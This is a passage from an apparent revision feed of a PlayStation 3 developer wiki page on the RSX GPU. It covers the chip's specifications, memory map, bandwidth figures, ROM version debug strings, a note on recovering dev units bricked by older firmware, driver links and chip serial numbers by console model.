RAMIN, RAMHT, RAMFC, DMA Objects, Graphic Objects, and the Graphic Context. The following is a breakdown of the address within 256MB of the RSX.<br /> <br /> {|class=&quot;wikitable&quot;<br /> |-<br /> ! Address Range !! Size !! Comment<br /> |-<br /> | 0000000-FBFFFFF || 252 MB || Framebuffer<br /> |-<br /> | FC00000-FFFFFFF || 4 MB || GPU Data<br /> |-<br /> | FF80000-FFFFFFF || 512KB || RAMIN: Instance Memory<br /> |-<br /> | FF90000-FF93FFF || 16KB || RAMHT: Hash Table<br /> |-<br /> | FFA0000-FFA0FFF || 4KB || RAMFC: FIFO Context<br /> |-<br /> | FFC0000-FFCFFFF || 64KB || DMA Objects<br /> |-<br /> | FFD0000-FFDFFFF || 64KB || Graphic Objects<br /> |-<br /> | FFE0000-FFFFFFF || 128KB || GRAPH: Graphic Context<br /> |-<br /> |}<br /> <br /> Besides local GDDR3 memory, main XDR memory can be accessed by RSX too, which is limited to either:<br /> * 0MB - 256MB (0x00000000 - 0x0FFFFFFF)<br /> ::-or-<br /> * 0MB - 512MB (0x00000000 - 0x1FFFFFFF)<br /> <br /> ==Speed, Bandwidth, and Latency==<br /> <br /> System bandwith (theoretical maximum):<br /> *Cell to/from 256MB XDR : 25.6 GB/s<br /> *Cell to RSX (IOIFO): 20GB/s (practical : 15.8GB/s @ packetsize 128B)<br /> *Cell from RSX (IOIFI) : 15GB/s (practical : 11.9GB/s @ packetsize 128B)<br /> *RSX to/from 256MB GDDR3 : 20.8GB/s (@ 650MHz)<br /> <br /> Because of the aforementioned layout of the communication path between the different chips, and the latency and bandwidth differences between the various components, there are different access speeds depending on the direction of the access in relation to the source and destination. The following is a chart showing the speed of reads and writes to the GDDR3 and XDR memory from the viewpoint of the Cell and RSX. Note that these are measured speeds (rather than calculated speeds) and they should be worse if RSX and GDDR3 access are involved because these figures were measured when the RSX was clocked at 550Mhz and the GDDR3 memory was clocked at 700Mhz. The shipped PS3 has the RSX clocked in at 500Mhz (front and back end, although the pixel shaders run separately inside at 550Mhz). In addition, the GDDR3 memory was also clocked lower at 650Mhz.<br /> <br /> === speed table ===<br /> {|class=&quot;wikitable&quot;<br /> |-<br /> ! Processor !! 256MB XDR !! 256MB GDDR3<br /> |-<br /> | Cell Read || 16.8GB/s || 16MB/s (15.6MB/s @ 650MHz)<br /> |-<br /> | Cell Write || 24.9GB/s || 4GB/s<br /> |-<br /> | RSX Read || 15.5GB/s || 22.4GB/s (20.8GB/s @ 650MHz)<br /> |-<br /> | RSX Write || 10.6GB/s || 22.4GB/s (20.8GB/s @ 650MHz)<br /> |-<br /> |}<br /> <br /> Because of the VERY slow Cell Read speed from the 256MB GDDR3 memory, it is more efficient for the Cell to work in XDR and then have the RSX pull data from XDR and write to GDDR3 for output to the HDMI display. This is why extra texture lookup instructions were included in the RSX to allow loading data from XDR memory (as opposed to the local GDDR3 memory).<br /> <br /> == ROM Versions ==<br /> <br /> These are the listed RSX ROM (aka Vbios) versions info we have collected from lv1 debug ouput<br /> <br /> DEH/DECR-1000:<br /> <br /> &lt;pre&gt;<br /> [INFO]: BE:3.1, SB:DX3.1<br /> rsx: a01 420/600 vpe:ff shd:3f [AE0000915:0:1:16:b:f:1:1:1]<br /> <br /> [INFO]: BE:3.1, SB:DX3.1<br /> rsx: a02 420/600 vpe:ff shd:3f [F9A458700:0:2:3:b:f:3:1:1][0:0:0:0:0:3]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b01 500/650 vpe:ff shd:5f [AE0000993:0:1:13:c:a:1:4:2][16:3:0:0:1:3:0]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b01 500/600 vpe:ff shd:77 [FCA684200:0:2:2:f:7:3:5:1][0:0:0:0:0]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b01 500/650 vpe:ff shd:5f [AE0000993:0:1:13:c:a:1:4:2][16:3:0:0:1:3:0]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b01 500/650 vpe:ff shd:7d [G1A778601:1:2:15:7:10:3:7:2][16:3:0:0:1:3:0]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b03 500/650 vpe:ff shd:7b [GAB886100:1:2:17:f:5:3:f:2][16:3:0:0:1:3:1][0:0:0]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b07 500/650 vpe:ff shd:3f [J3E106900:1:2:c:b:6:3:12:1][16:3:2:0:1:3:1][0:0:0]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b07 500/650 vpe:ff shd:3f [J3E107200:1:2:a:6:3:3:12:1][16:3:2:0:1:3:1][0:0:0]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b07 500/650 vpe:ff shd:3f [J3E078500:1:2:11:c:f:3:12:1][16:3:2:0:1:3:1][0:0:0]<br /> &lt;/pre&gt;<br /> <br /> RETAIL: <br /> &lt;pre&gt;<br /> [INFO]: BE:3.1, SB:DX3.1<br /> rsx: b08 1f4/28a vpe:ff shd:3f [AP0004687:1:1:14:13:a:2:f:1][16:3:1:1:1:3:1][0:0:0]<br /> &lt;/pre&gt;<br /> <br /> Speculatively it is likely that the very first numbers are the actual rom version (a01, b01, b03, b07, b08...) despite Sony's documentation claiming otherwise, DECR-1000 units with rom version b07 and above (and perhaps some others that have not been encounter) are not capable of running any firmware lower than 1.60 (from sdk 160.008) this is because the rom version is unknown/unsupported in older lv1 which will fail to initialize the RSX hardware and will cause lv1 to output a &quot;rsx rom abort!&quot; messaage, this will in turn create an exception early in lv2 boot process as it tries to use the RSX and creates a hard brick several RSX related errors such as &quot;lv2(2): # __rsxaudio_intr_create_thread 983 ffffffff&quot; or &quot;graphics error 512 : 00012625 c221bbb0&quot; ; &quot;lv2(2): page fault handler (DSI): invalid access address 0x795d00e8!&quot;. <br /> <br /> There is nothing in the documentation warning you about this and there is nothing preventing (or a legitimate developer) to install an unsupported firmware as the vsh allows updating to 1.00 or higher and the min praxis for those units is actually lower than 1.00.<br /> Should this issue occur to you, other than sending the unit back to Sony for servicing, the only way to fix this is to flash an ebootrom (as lv0 still runs fine and is in charge of handling flashing the system memory through lcnslsrv) the problem with that is that sony never released/issue an ebootrom for a firmware higher than 1.00.002 , so officially one would have no choice but to return the unit, that said, considering the ebootrom format is not rocket science and is actually documented (it's a very slight variation of the coreos package format, there are no specific checks whatsoever preventing you from crafting your own, it is not hashed, nor encrypted), you could (as we did) convert the PUP file of a higher firmware and flash it into the unit to get a full recovery.<br /> <br /> == RSX Libraries ==<br /> The RSX is dedicated to 3D graphics, and developers are able to use different API libraries to access its features. The easiest way is to use high level PSGL, which is basicially OpenGL|ES with programmable pipeline added in - but hardly anyone uses PSGL these days, preferring to use the native GPU command buffer generation library, libgcm.<br /> At a lower level developers can use LibGCM, which is an API that talks to the RSX at a lower level. PSGL is actually implemented on top of LibGCM. For the advanced programmer, you can program the RSX by sending commands to it directly using C or assembly. This can be done by setting up commands (via FIFO Context) and DMA Objects and issuing them to the RSX via DMA calls.<br /> <br /> == Drivers (WiP/reference) ==<br /> <br /> * [http://mandos.homelinux.org/~glaurung/git/ps3rsx.git/ ps3rsx.git]<br /> * [http://mandos.homelinux.org/~glaurung/git/xf86-video-ps3.git/ xf86-video-ps3.git]<br /> * [http://nouveau.freedesktop.org/wiki/ nouveau wiki]<br /> * [http://psp.jim.sh/svn/listing.php?repname=ps3ware&amp;path=%2Ftrunk%2Flibps3rsx%2Fsrc%2Ffifo%2F&amp;#a408e4e3f64f03a0a91e8200a1a873401 libps3rsx]<br /> * [http://www.mesa3d.org/cell.html Mesa/Gallium Cell Driver]<br /> * git://nouveau.git.sourceforge.net/gitroot/nouveau/envytools (docs are in hwdocs, commands are in the xml's in rnndb)<br /> <br /> [[PSL1GHT]]<br /> * http://psl1ght.net/wiki/Homebrew_status<br /> * https://code.google.com/p/rsxgl/ / https://github.com/gzorin/RSXGL<br /> * https://github.com/kakaroto/e17<br /> <br /> = Other References =<br /> *&lt;strike&gt;http://7track.org/~durandal/ps3dox/&lt;/strike&gt; http://lol.notsoldierx.com/~durandal/ps3dox/ // http://173.220.0.157/~durandal/ps3dox/<br /> *http://wiki.ps2dev.org/ps3:rsx<br /> *[http://download.nvidia.com/developer/cg/Cg_1.4/1.4.1/Cg-1.4.1_UsersManual.pdf Cg Toolkit User's Manual: A Developer's Guide to Programmable Graphics, Release 1.4.1]<br /> *The Cg Tutorial (ISBN: 0321194969, Addison-Wesley, 2003)<br /> * [http://www.multiupload.com/D1XJHRH6Z9 cg-shader-tutorial.pdf (535.94 KB)] + [https://github.com/Themaister/Emulator-Shader-Pack Git: Emulator-Shader-Pack ]<br /> * http://pastie.org/private/qbpm88aml03vq8jexxvnsa PS3 RSX Glevand<br /> <br /> * Good overview of quotes of how SPU's are used together with RSX for retail games:<br /> **[http://www.neogaf.com/forum/showthread.php?p=7598043 PS3 games list &amp; SPE usages part 1]<br /> **[http://www.neogaf.com/forum/showpost.php?p=7598610&amp;postcount=32 PS3 games list &amp; SPE usages part 2]<br /> <br /> <br /> <br /> {{Motherboard Components}}&lt;noinclude&gt;[[Category:Main]]&lt;/noinclude&gt;</div> Mathieulh http://www.psdevwiki.com/ps3/index.php?title=RSX&diff=41311 RSX 2016-03-18T18:36:54Z <p>Mathieulh: /* ROM Versions */ changed the laylout</p> <hr /> <div>&lt;div style=&quot;float:right&quot;&gt;[[File:SCEI CXD2971DGB.JPG|200px|thumb|left|&lt;br /&gt;RSX - Reality Synthesizer&lt;br /&gt;1st generation 90nm&lt;br /&gt;CXD2971DGB]]&lt;br /&gt;[[File:RSX-GDDR-BGA-lifted.jpg|200px|thumb|left|&lt;br /&gt;RSX - Reality Synthesizer&lt;br /&gt;GDDR3 BGA lifted]]&lt;br /&gt;[[File:RSX-GPUcore-lifted.jpg|200px|thumb|left|&lt;br /&gt;RSX - Reality Synthesizer&lt;br /&gt;GPUcore BGA lifted]]&lt;br /&gt;[[File:RSX-BGA-lifted-missingpads.jpg|200px|thumb|left|&lt;br /&gt;RSX - Reality Synthesizer&lt;br /&gt;BGA lifted&lt;br /&gt;PCB underneath]]&lt;br /&gt;[[File:Nvidia-Die-G70.png|200px|thumb|left|&lt;br /&gt;Nvidia G70 die shot]]&lt;br/&gt;[[File:RSX die - Image made by Héctor Martín.jpg|200px|thumb|left|&lt;br /&gt;RSX die, scraped with razorblade by Héctor Martín]]&lt;br/&gt;[[File:BGA_crack1.jpg|200px|thumb|left|&lt;br /&gt;BGA Cracking (one of the reasons for YLOD error)]]&lt;/div&gt;<br /> <br /> = Hardware =<br /> RSX - Reality Synthesizer<br /> <br /> The RSX 'Reality Synthesizer' is a proprietary graphics processing unit (GPU) codeveloped by Nvidia and Sony for the PlayStation 3 game console. It is a GPU based on the Nvidia 7800GTX graphics processor and, according to Nvidia, is a G70/G71 (previously known as NV47) hybrid architecture with some modifications. The RSX has separate vertex and pixel shader pipelines. The GPU makes use of 256 MB GDDR3 RAM clocked at 650&lt;!--// NOT 700!!!//--&gt; MHz with an effective transmission rate of 1.4 GHz and up to 224 MB of the 3.2 GHz XDR main memory via the CPU (480 MB max).<br /> <br /> == Specifications ==<br /> * &lt;abbr title=&quot;dmesg|grep rsx :: ps3rsx: version 2.11 RSX rev17 0MB RAM channel 1 core 500MHz mem 650MHz&quot;&gt;500&lt;/abbr&gt;&amp;nbsp;MHz on 90 nm process (shrunk to 65 nm in 2008 and to 40 nm in 2010)<br /> * Based on NV47 Chip (Nvidia GeForce 7800 Architecture)<br /> ** early development tools had NV47 with 256 bit local memory interface and 16 ROPs<br /> ** later RSX with 128bit local memory interface and 8 ROPs<br /> * Little Endian<br /> ** 300+ million transistors<br /> ** Multi-way programmable parallel floating-point shader pipelines<br /> *** Independent pixel/vertex shader architecture<br /> *** 24 parallel pixel-shader ALU pipes clocked @ 550 MHz<br /> **** 5 ALU operations per pipeline, per cycle (2 vector&lt;sub&gt;4&lt;/sub&gt; , 2 scalar/dual/co-issue and fog ALU, 1 Texture ALU)<br /> **** 27 floating-point operations per pipeline, per cycle<br /> *** 8 parallel vertex pipelines<br /> **** 2 ALU operations per pipeline, per cycle (1 vector&lt;sub&gt;4&lt;/sub&gt; and 1 scalar, dual issue)<br /> **** 10 FLOPS per pipeline, per cycle<br /> *** Floating Point Operations: 400.4 Gigaflops ((24 * 27 Flops + 8 * 10 Flops) * 550)<br /> ** 24 texture filtering units (TF) and 8 vertex texture addressing units (TA)<br /> *** 24 filtered samples per clock<br /> **** Maximum Texel fillrate: 12.0 GigaTexels per second (24 textures * 500&amp;nbsp;MHz)<br /> *** 32 unfiltered texture samples per clock, ( 8 TA x 4 texture samples )<br /> ** 8 Render Output units / pixel rendering pipelines<br /> *** Peak pixel fillrate (theoretical): 4.0 Gigapixel per second<br /> *** Maximum Z-buffering sample rate: 8.0 GigaSamples per second (2 Z-samples * 8 ROPs * 500&amp;nbsp;MHz)<br /> ** Maximum Dot product operations: 51 billion per second (combined with Cell CPU)<br /> ** 128-bit pixel precision offers rendering of scenes with High dynamic range rendering<br /> ** 256 MB GDDR3 RAM at &lt;abbr title=&quot;dmesg|grep rsx :: ps3rsx: version 2.11 RSX rev17 0MB RAM channel 1 core 500MHz mem 650MHz&quot;&gt;650&amp;nbsp;MHz&lt;/abbr&gt;&lt;!--// NOT 700 !! //--&gt;<br /> *** Earlier PS3 Models: Samsung K4J52324QC-SC14 rated max 700MHz<br /> *** Later PS3 Models: Qimonda HYB18H512322AF-14 (seen on CXD2971DGB)<br /> *** 128-bit memory bus width<br /> *** 22.4 GB/s read and write bandwidth<br /> ** Cell FlexIO bus interface<br /> *** Rambus XDR Memory interface bus width: 56bit out of 64bit (serial)<br /> *** 20 GB/s read to the Cell and XDR memory<br /> *** 15 GB/s write to the Cell and XDR memory<br /> ** Support for PSGL (OpenGL ES 1.1 + Nvidia Cg)<br /> ** Support for S3 Texture Compression<br /> <br /> <br /> <br /> More features are revealed in the following chart delineating the differences between the RSX and the nVidia 7800 GTX.<br /> <br /> {|class=&quot;wikitable&quot;<br /> |-<br /> ! Difference !! RSX !! nVidia 7800GTX<br /> |-<br /> | GDDR3 Memory bus || 128bit || 256bit<br /> |-<br /> | ROPs || 8 || 16<br /> |-<br /> | Post Transform and Lighting Cache || 63 max vertices || 45 max vertices<br /> |-<br /> | Total Texture Cache Per Quad of Pixel Pipes (L1 and L2) || 96kB || 48kB<br /> |-<br /> | CPU interface || FlexIO || PCI-Express 16x<br /> |-<br /> | Technology || 40nm/65nm/90nm || 110nm<br /> |-<br /> |}<br /> <br /> Other RSX features/differences include:<br /> <br /> More shader instructions<br /> Extra texture lookup logic (helps RSX transport data from XDR)<br /> Fast vector normalize <br /> <br /> Note that the cache (Post Transform and Lighting Vertext Cache) is located between the vector shader and the triangle setup.<br /> <br /> A sample flow of data inside the RSX would see them first processed by 8 vertex shaders. The output are then sent to the 24 active pixel shaders, which can involve the 24 active texture units. Finally, the data is passed to the 8 Raster Operation Pipeline units (ROPs), and on out to the GDDR3. Note that the pixel shaders are grouped into groups of four (called Quads). There are 7 Quads, with 1 redundant, leaving 6 Quads active, which provides us with the 24 active pixel shaders listed above (6 times 4 equals 24). Since each Quad has 96kB of L1 and L2 cache, the total RSX texture cache is 576kB. General RSX features include 2x and 4x hardware anti-aliasing, and support for Shader Model 3.0.<br /> <br /> == Serial Numbers @ SKU's ==<br /> &lt;gallery&gt;<br /> File:PS3 - RSX - 40nm 65nm 90nm - die sizes.jpg|[[RSX]] die sizes, left to right: 40nm 65nm 90nm<br /> &lt;/gallery&gt;<br /> <br /> The following is a small sample of serial numbers of the RSX by model number.<br /> <br /> {|class=&quot;wikitable&quot;<br /> |-<br /> ! PS3 Model !! Mobo Model !! Mobo serial !! RSX Serial !! Die Tech !! Die Size !! Remark<br /> |-<br /> | [[CECHAxx]] || [[COK-00x#COK-001|COK-001]] || 1-871-868-12 || [[CXD2971GB]] || 90nm || 258mm² || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECHAxx]] || [[COK-00x#COK-001|COK-001]] || 1-871-868-12 || [[CXD2971AGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHAxx]] || [[COK-00x#COK-001|COK-001]] || 1-871-868-22 || [[CXD2971DGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHAxx]] || [[COK-00x#COK-001|COK-001]] || 1-871-868-32 || [[CXD2971DGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHAxx]] || [[COK-00x#COK-001|COK-001]] || 1-871-868-32 || [[CXD2971AGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHBxx]] || [[COK-00x#COK-001|COK-001]] || 1-871-868-22 || [[CXD2971DGB]] || 90nm || 258mm² || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECHBxx]] || [[COK-00x#COK-001|COK-001]] || 1-871-868-32 || [[CXD2971DGB]] || 90nm || 258mm² || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECHCxx]] || [[COK-00x#COK-002|COK-002]] || 1-873-513-11 || [[CXD2971DGB]] || 90nm || 258mm² || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECHCxx]] || [[COK-00x#COK-002|COK-002]] || 1-873-513-21 || [[CXD2971GB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHCxx]] || [[COK-00x#COK-002|COK-002]] || 1-873-513-31 || [[CXD2971DGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;[[CECHDxx]]&lt;/span&gt; || colspan=&quot;6&quot; style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;SKU never released&lt;/span&gt;<br /> |-<br /> | [[CECHExx]] || [[COK-00x#COK-002W|COK-002W]] || 1-873-513-xx || -? || 90nm || 258mm² || -<br /> |-<br /> | style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;[[CECHFxx]]&lt;/span&gt; || colspan=&quot;6&quot; style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;SKU never released&lt;/span&gt;<br /> |-<br /> | [[CECHGxx]] || [[SEM-00x|SEM-001]] || 1-875-384-xx || [[CXD2971DGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHGxx]] || [[SEM-00x|SEM-001]] || 1-875-384-xx || [[CXD2971BGB]]&lt;br /&gt;&amp;nbsp;&amp;nbsp;or:&lt;br /&gt;[[CXD2971DGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHGxx]] || [[SEM-00x|SEM-001]] || 1-875-384-xx || [[CXD2971AGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHGxx]] || [[SEM-00x|SEM-001]] || 1-875-384-xx || [[CXD2971DGB]] || 90nm || 258mm² || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECHHxx]] || [[DIA-00x#DIA-001|DIA-001]] || 1-875-938-11 || [[CXD2971AGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHHxx]] || [[DIA-00x#DIA-001|DIA-001]] || 1-875-368-11 || [[CXD2971-1GB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHHxx]] || [[DIA-00x#DIA-001|DIA-001]] || 1-875-368-11 || [[CXD2971AGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHHxx]] || [[DIA-00x#DIA-001|DIA-001]] || 1-875-368-11 || [[CXD2971AGB]] || 90nm || 258mm² || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;[[CECHIxx]]&lt;/span&gt; || colspan=&quot;6&quot; style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;SKU never released&lt;/span&gt;<br /> |-<br /> | [[CECHJxx]] || [[DIA-00x#DIA-002|DIA-002]] || 1-876-912-xx || [[CXD2982GB]] || 65nm || ? 186mm² ? || -<br /> |-<br /> | [[CECHKxx]] || [[DIA-00x#DIA-002|DIA-002]] || 1-876-912-42 || [[CXD2982GB]] || 65nm || ? 186mm² ? || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHKxx]] || [[DIA-00x#DIA-002|DIA-002]] || 1-876-912-xx || [[CXD2982GB]] || 65nm || ? 186mm² ? || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECHLxx]] || [[VER-00x|VER-001]] || 1-878-196-31 || [[CXD2991GB]] || 65nm || ? 186mm² ? || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHLxx]] || [[VER-00x|VER-001]] || 1-878-196-31 || [[CXD2991GB]] || 65nm || ? 186mm² ? || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECHMxx]] || [[VER-00x|VER-001]] || 1-878-196-31 || -? || 65nm || ? 186mm² ? || -<br /> |-<br /> | style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;[[CECHNxx]]&lt;/span&gt; || colspan=&quot;6&quot; style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;SKU never released&lt;/span&gt;<br /> |-<br /> | style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;[[CECHOxx]]&lt;/span&gt; || colspan=&quot;6&quot; style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;SKU never released&lt;/span&gt;<br /> |-<br /> | [[CECHPxx]] || [[VER-00x|VER-001]] || 1-878-196-31 || -? || 65nm || ? 186mm² ? || -<br /> |-<br /> | [[CECHQxx]] || [[VER-00x|VER-001]] || 1-878-196-31 || -? || 65nm || ? 186mm² ? || -<br /> |-<br /> | [[CECH-20xx]] || [[DYN-00x|DYN-001]] || 1-880-055-31 || [[CXD2991CGB]] || 65nm || ? 186mm² ? || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECH-20xx]] || [[DYN-00x|DYN-001]] || 1-880-055-31 || [[CXD2991EGB]] || 65nm || ? 186mm² ? || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECH-20xx]] || [[DYN-00x|DYN-001]] || 1-880-055-31 || [[CXD2991EGB]] || 65nm || ? 186mm² ? || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECH-21xx]] || [[SUR-00x|SUR-001]] || 1-881-945-11 || [[CXD5300AGB]] || 40nm || ? 114mm² ? || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECH-21xx]] || [[SUR-00x|SUR-001]] || 1-881-945-11 || [[CXD5300AGB]] || 40nm || ? 114mm² ? || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECH-25xx]] || [[JTP-00x|JTP-001]] || 1-882-481-11 || [[CXD5300A1GB]] || 40nm || ? 114mm² ? || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECH-25xx]] || [[JSD-00x|JSD-001]] || 1-882-770-11 || [[CXD5300A1GB]] || 40nm || ? 114mm² ? || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECH-30xx]] || [[KTE-00x|KTE-001]] || 1-884-749-11 || [[CXD5301DGB]] || 40nm || ? 114mm² ? || -<br /> |-<br /> | [[CECH-40xx]] || [[MSX-00x|MSX-001]] || 1-886-928-11 || [[CXD5302DGB]] || 40nm || ? 114mm² ? || -<br /> |-<br /> | [[CECH-40xx]] || [[MPX-00x|MPX-001]] || 1-887-233-11 || [[CXD5302A1GB]] || 40nm || ? 114mm² ? || - [http://pocketnews.cocolog-nifty.com/pkns/2012/10/ps3-cech-4000-e.html pocketnews dissasembly]<br /> |-<br /> |}<br /> Other unspecified: [[CXD297BGB]] and [[CXD2971-1GB]] (CECHA&lt;!--//Pereb//--&gt; refurbished? note:lowest FW was 2.30)<br /> ===Alternative list===<br /> * [[CECHAxx]]/[[COK-00x#COK-001|COK-001]], [[CECHBxx]]/[[COK-00x#COK-001|COK-001]], [[CECHCxx]]/[[COK-00x#COK-002|COK-002]], [[CECHExx]]/[[COK-00x#COK-002W|COK-002W]] and [[CECHHxx]]/[[DIA-00x#DIA-001|DIA-001]] : [[CXD2971AGB]] (RSX 90nm)<br /> * [[CECHGxx]]/[[SEM-00x|SEM-001]] : [[CXD2971DGB]] (RSX 90nm)<br /> * [[CECHJxx]]/[[DIA-00x#DIA-002|DIA-002]] and [[CECHKxx]]/[[DIA-00x#DIA-002|DIA-002]] : [[CXD2982]] (RSX 65nm)<br /> * [[CECHLxx]]/[[VER-00x|VER-001]] up to including [[CECHQxx]]/[[VER-00x|VER-001]] : [[CXD2991BGB]] (RSX 65nm)<br /> * [[CECH-20xx]]/[[DYN-00x|DYN-001]] : [[CXD2991GGB]] (RSX 65nm)<br /> * [[CECH-21xx]]/[[SUR-00x|SUR-001]] : [[CXD5300AGB]] (RSX 40nm)<br /> * [[CECH-25xx]]/[[JTP-00x|JTP-001]] and [[CECH-25xx]]/[[JSD-00x|JSD-001]]: [[CXD5300A1GB]] (RSX 40nm)<br /> * [[CECH-30xx]]/[[KTE-00x|KTE-001]] : [[CXD5301DGB]] (RSX 40nm)<br /> &lt;br /&gt;<br /> <br /> == Local GDDR3 Memory Physical Structure==<br /> * Total Memory 256MB<br /> * 2 Partitions (128MB)<br /> * 64bit bus per partition<br /> * 8 Banks per partition (16MB)<br /> * 4096 Pages per bank (4KB) -&gt; 12bit Row Address<br /> * Memory block in a page -&gt; 9bit Column Address<br /> * Minimum access granularity = 8 bytes -&gt; same as buswidth between RSX &lt;&gt; GDDR<br /> <br /> =Software=<br /> <br /> == RSX Memorymap ==<br /> <br /> Although the RSX has 256MB of GDDR3 RAM, not all of it is useable. The last 4MB is reserved for keeping track of the RSX internal state and issued commands. The 4MB of GPU Data contains RAMIN, RAMHT, RAMFC, DMA Objects, Graphic Objects, and the Graphic Context. The following is a breakdown of the address within 256MB of the RSX.<br /> <br /> {|class=&quot;wikitable&quot;<br /> |-<br /> ! Address Range !! Size !! Comment<br /> |-<br /> | 0000000-FBFFFFF || 252 MB || Framebuffer<br /> |-<br /> | FC00000-FFFFFFF || 4 MB || GPU Data<br /> |-<br /> | FF80000-FFFFFFF || 512KB || RAMIN: Instance Memory<br /> |-<br /> | FF90000-FF93FFF || 16KB || RAMHT: Hash Table<br /> |-<br /> | FFA0000-FFA0FFF || 4KB || RAMFC: FIFO Context<br /> |-<br /> | FFC0000-FFCFFFF || 64KB || DMA Objects<br /> |-<br /> | FFD0000-FFDFFFF || 64KB || Graphic Objects<br /> |-<br /> | FFE0000-FFFFFFF || 128KB || GRAPH: Graphic Context<br /> |-<br /> |}<br /> <br /> Besides local GDDR3 memory, main XDR memory can be accessed by RSX too, which is limited to either:<br /> * 0MB - 256MB (0x00000000 - 0x0FFFFFFF)<br /> ::-or-<br /> * 0MB - 512MB (0x00000000 - 0x1FFFFFFF)<br /> <br /> ==Speed, Bandwidth, and Latency==<br /> <br /> System bandwith (theoretical maximum):<br /> *Cell to/from 256MB XDR : 25.6 GB/s<br /> *Cell to RSX (IOIFO): 20GB/s (practical : 15.8GB/s @ packetsize 128B)<br /> *Cell from RSX (IOIFI) : 15GB/s (practical : 11.9GB/s @ packetsize 128B)<br /> *RSX to/from 256MB GDDR3 : 20.8GB/s (@ 650MHz)<br /> <br /> Because of the aforementioned layout of the communication path between the different chips, and the latency and bandwidth differences between the various components, there are different access speeds depending on the direction of the access in relation to the source and destination. The following is a chart showing the speed of reads and writes to the GDDR3 and XDR memory from the viewpoint of the Cell and RSX. Note that these are measured speeds (rather than calculated speeds) and they should be worse if RSX and GDDR3 access are involved because these figures were measured when the RSX was clocked at 550Mhz and the GDDR3 memory was clocked at 700Mhz. The shipped PS3 has the RSX clocked in at 500Mhz (front and back end, although the pixel shaders run separately inside at 550Mhz). In addition, the GDDR3 memory was also clocked lower at 650Mhz.<br /> <br /> === speed table ===<br /> 